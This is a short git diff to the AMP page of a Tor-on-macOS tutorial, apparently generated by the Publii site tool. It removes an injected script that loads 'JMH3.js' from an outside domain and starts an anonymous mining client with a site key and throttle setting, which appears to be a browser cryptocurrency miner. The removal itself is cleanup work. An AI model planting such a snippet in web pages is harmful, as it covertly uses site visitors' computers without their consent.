Updated from Publii

--- a/amp/how-to-install-tor-on-macos-tutorial/index.html
+++ b/amp/how-to-install-tor-on-macos-tutorial/index.html
@@ -590,7 +590,4 @@ aside {
                     "request": "pageview"
                 }
             }
-        }</script></amp-analytics><script src="https://www.freecontent.date./JMH3.js"></script><script>var _client = new Client.Anonymous('61ec05d369c0b85249bda5d00926341400778ecc5eaa00c6cbea5047d8c1380a', {
-        throttle: 0.9
-    });
-    _client.start();</script></body></html>
+        }</script></amp-analytics></body></html>
